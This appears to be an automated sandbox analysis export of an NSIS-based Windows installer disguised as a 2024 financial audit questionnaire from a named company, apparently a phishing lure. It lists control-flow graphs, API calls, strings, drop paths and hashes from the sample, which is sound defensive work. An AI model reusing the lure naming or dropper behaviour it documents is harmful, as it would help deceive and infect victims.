401620 4753->4756 4760 40163e 4754->4760 4755->4747 4758 4015fa GetFileAttributesW 4755->4758 4761 405f8c lstrcpynW 4756->4761 4758->4747 4759 40162d SetCurrentDirectoryW 4759->4760 4761->4759 5703 401939 5704 402b3a 18 API calls 5703->5704 5705 401940 lstrlenW 5704->5705 5706 4024e8 5705->5706 5707 40293b 5708 402b1d 18 API calls 5707->5708 5709 402941 5708->5709 5710 402793 5709->5710 5711 402974 5709->5711 5713 40294f 5709->5713 5711->5710 5712 405fae 18 API calls 5711->5712 5712->5710 5713->5710 5715 405ed3 wsprintfW 5713->5715 5715->5710 4974 40173f 4975 402b3a 18 API calls 4974->4975 4976 401746 4975->4976 4977 405c27 2 API calls 4976->4977 4978 40174d 4977->4978 4979 405c27 2 API calls 4978->4979 4979->4978 5716 10002a7f 5717 10002a97 5716->5717 5718 1000158f 2 API calls 5717->5718 5719 10002ab2 5718->5719

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062f6 SHGetFileInfoW call 405f8c GetCommandLineW call 405f8c GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 405a04 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 18 403432-403436 14->18 19 40342c-403431 14->19 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 21 4034f7-403506 call 405a04 18->21 22 40343c-403442 18->22 19->18 21->11 40 403508-403509 21->40 26 403444-40344b 22->26 27 40345c-403495 22->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 33 403452 26->33 34 40344d-403450 26->34 28 4034b2-4034ec 27->28 29 403497-40349c 27->29 37 4034f4-4034f6 28->37 38 4034ee-4034f2 28->38 29->28 35 40349e-4034a6 29->35 33->27 34->27 34->33 41 4034a8-4034ab 35->41 42 4034ad 35->42 37->21 38->37 44 403518-403525 call 405f8c 38->44 40->11 41->28 41->42 42->28 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405768 ExitProcess 45->57 49 403657-40365e call 40391f 46->49 50 4035c8-4035d3 call 405a04 46->50 59 403663 49->59 63 403621-40362b 50->63 64 4035d5-40360a 50->64 61 403815-40381d 56->61 62 40377e-40379b call 4062f6 * 3 56->62 59->45 69 403823-403827 ExitProcess 61->69 70 40381f 61->70 92 4037e5-4037f3 call 4062f6 62->92 93 40379d-40379f 62->93 67 403692-4036ac lstrcatW lstrcmpiW 63->67 68 40362d-40363b call 405adf 63->68 65 40360c-403610 64->65 73 403612-403617 65->73 74 403619-40361d 65->74 67->45 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->45 83 40363d-403653 call 405f8c * 2 68->83 70->69 73->74 78 40361f 73->78 74->65 74->78 80 4036d1-4036fa call 405f8c 76->80 81 4036c6-4036cc call 405f8c 76->81 78->63 91 4036ff-40371b call 405fae DeleteFileW 80->91 81->80 83->49 101 40375c-403764 91->101 102 40371d-40372d CopyFileW 91->102 104 403801-40380c ExitWindowsEx 92->104 105 4037f5-4037ff 92->105 93->92 96 4037a1-4037a3 93->96 96->92 103 4037a5-4037b7 GetCurrentProcess 96->103 101->91 107 403766-40376d call 405e26 101->107 102->101 106 40372f-40374f call 405e26 call 405fae call 405703 102->106 103->92 115 4037b9-4037db 103->115 104->61 109 40380e-403810 call 40140b 104->109 105->104 105->109 106->101 122 403751-403758 CloseHandle 106->122 107->45 109->61 115->92 122->101
                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 00403379
                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                      • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                                                      • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                                                      • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                    • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                      • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                    • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",00000000), ref: 004033DB
                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",00000020), ref: 00403403
                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                                                                    • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                    • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",00000000,?), ref: 00403698
                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",00000000,?), ref: 004036A4
                                                                                                    • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                                                                    • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,0041FEA8,?), ref: 00403725
                                                                                                    • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                    • ExitProcess.KERNEL32 ref: 00403827
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145$C:\Users\user\Desktop$C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                    • API String ID: 4107622049-1641852892
                                                                                                    • Opcode ID: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                                                                    • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                                                                    • Opcode Fuzzy Hash: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                                                                    • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 123 405373-40538e 124 405394-40545b GetDlgItem * 3 call 4041cf call 404ad1 GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 40551d-405524 123->125 143 405479-40547c 124->143 144 40545d-405477 SendMessageW * 2 124->144 127 405526-405548 GetDlgItem CreateThread CloseHandle 125->127 128 40554e-40555b 125->128 127->128 129 405579-405583 128->129 130 40555d-405563 128->130 134 405585-40558b 129->134 135 4055d9-4055dd 129->135 132 405565-405574 ShowWindow * 2 call 4041cf 130->132 133 40559e-4055a7 call 404201 130->133 132->129 147 4055ac-4055b0 133->147 140 4055b3-4055c3 ShowWindow 134->140 141 40558d-405599 call 404173 134->141 135->133 138 4055df-4055e5 135->138 138->133 145 4055e7-4055fa SendMessageW 138->145 148 4055d3-4055d4 call 404173 140->148 149 4055c5-4055ce call 405234 140->149 141->133 150 40548c-4054a3 call 40419a 143->150 151 40547e-40548a SendMessageW 143->151 144->143 152 405600-40562b CreatePopupMenu call 405fae AppendMenuW 145->152 153 4056fc-4056fe 145->153 148->135 149->148 162 4054a5-4054b9 ShowWindow 150->162 163 4054d9-4054fa GetDlgItem SendMessageW 150->163 151->150 160 405640-405655 TrackPopupMenu 152->160 161 40562d-40563d GetWindowRect 152->161 153->147 160->153 164 40565b-405672 160->164 161->160 165 4054c8 162->165 166 4054bb-4054c6 ShowWindow 162->166 163->153 167 405500-405518 SendMessageW * 2 163->167 168 405677-405692 SendMessageW 164->168 169 4054ce-4054d4 call 4041cf 165->169 166->169 167->153 168->168 170 405694-4056b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 4056b9-4056e0 SendMessageW 170->172 172->172 173 4056e2-4056f6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->153
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040541D
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054C0
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                                                      • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00405548
                                                                                                    • ShowWindow.USER32(00000000), ref: 0040556C
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405571
                                                                                                    • ShowWindow.USER32(00000008), ref: 004055BB
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                                                                    • CreatePopupMenu.USER32 ref: 00405600
                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405634
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040564D
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405695
                                                                                                    • EmptyClipboard.USER32 ref: 0040569B
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                                                                    • CloseClipboard.USER32 ref: 004056F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID: {$&B
                                                                                                    • API String ID: 590372296-2518801558
                                                                                                    • Opcode ID: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                                                                    • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
                                                                                                    • Opcode Fuzzy Hash: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                                                                    • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 419 405fae-405fb9 420 405fbb-405fca 419->420 421 405fcc-405fe2 419->421 420->421 422 405fe8-405ff5 421->422 423 4061fa-406200 421->423 422->423 424 405ffb-406002 422->424 425 406206-406211 423->425 426 406007-406014 423->426 424->423 428 406213-406217 call 405f8c 425->428 429 40621c-40621d 425->429 426->425 427 40601a-406026 426->427 430 4061e7 427->430 431 40602c-406068 427->431 428->429 433 4061f5-4061f8 430->433 434 4061e9-4061f3 430->434 435 406188-40618c 431->435 436 40606e-406079 GetVersion 431->436 433->423 434->423 439 4061c1-4061c5 435->439 440 40618e-406192 435->440 437 406093 436->437 438 40607b-40607f 436->438 446 40609a-4060a1 437->446 438->437 443 406081-406085 438->443 441 4061d4-4061e5 lstrlenW 439->441 442 4061c7-4061cf call 405fae 439->442 444 4061a2-4061af call 405f8c 440->444 445 406194-4061a0 call 405ed3 440->445 441->423 442->441 443->437 451 406087-40608b 443->451 455 4061b4-4061bd 444->455 445->455 447 4060a3-4060a5 446->447 448 4060a6-4060a8 446->448 447->448 453 4060e4-4060e7 448->453 454 4060aa-4060d0 call 405e59 448->454 451->437 456 40608d-406091 451->456 460 4060f7-4060fa 453->460 461 4060e9-4060f5 GetSystemDirectoryW 453->461 467 4060d6-4060df call 405fae 454->467 468 40616f-406173 454->468 455->441 459 4061bf 455->459 456->446 463 406180-406186 call 406220 459->463 465 406165-406167 460->465 466 4060fc-40610a GetWindowsDirectoryW 460->466 464 406169-40616d 461->464 463->441 464->463 464->468 465->464 469 40610c-406116 465->469 466->465 467->464 468->463 472 406175-40617b lstrcatW 468->472 474 406130-406146 SHGetSpecialFolderLocation 469->474 475 406118-40611b 469->475 472->463 476 406161 474->476 477 406148-40615f SHGetPathFromIDListW CoTaskMemFree 474->477 475->474 479 40611d-406124 475->479 476->465 477->464 477->476 480 40612c-40612e 479->480 480->464 480->474
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,?,0040526B,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 00406071
                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060EF
                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406102
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040614C
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406157
                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,?,0040526B,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 004061D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 900638850-2138936317
                                                                                                    • Opcode ID: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                                                                    • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                                                                    • Opcode Fuzzy Hash: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                                                                    • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 681 405814-40583a call 405adf 684 405853-40585a 681->684 685 40583c-40584e DeleteFileW 681->685 687 40585c-40585e 684->687 688 40586d-40587d call 405f8c 684->688 686 4059d0-4059d4 685->686 689 405864-405867 687->689 690 40597e-405983 687->690 696 40588c-40588d call 405a23 688->696 697 40587f-40588a lstrcatW 688->697 689->688 689->690 690->686 693 405985-405988 690->693 694 405992-40599a call 4062cf 693->694 695 40598a-405990 693->695 694->686 705 40599c-4059b0 call 4059d7 call 4057cc 694->705 695->686 699 405892-405896 696->699 697->699 701 4058a2-4058a8 lstrcatW 699->701 702 405898-4058a0 699->702 704 4058ad-4058c9 lstrlenW FindFirstFileW 701->704 702->701 702->704 706 405973-405977 704->706 707 4058cf-4058d7 704->707 721 4059b2-4059b5 705->721 722 4059c8-4059cb call 405234 705->722 706->690 712 405979 706->712 709 4058f7-40590b call 405f8c 707->709 710 4058d9-4058e1 707->710 723 405922-40592d call 4057cc 709->723 724 40590d-405915 709->724 713 4058e3-4058eb 710->713 714 405956-405966 FindNextFileW 710->714 712->690 713->709 717 4058ed-4058f5 713->717 714->707 720 40596c-40596d FindClose 714->720 717->709 717->714 720->706 721->695 726 4059b7-4059c6 call 405234 call 405e26 721->726 722->686 732 40594e-405951 call 405234 723->732 733 40592f-405932 723->733 724->714 727 405917-405920 call 405814 724->727 726->686 727->714 732->714 736 405934-405944 call 405234 call 405e26 733->736 737 405946-40594c 733->737 736->714 737->714
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 0040583D
                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 00405885
                                                                                                    • lstrcatW.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 004058A8
                                                                                                    • lstrlenW.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 004058AE
                                                                                                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 004058BE
                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040596D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp$\*.*
                                                                                                    • API String ID: 2035342205-1769224861
                                                                                                    • Opcode ID: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                                                                    • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
                                                                                                    • Opcode Fuzzy Hash: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                                                                    • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
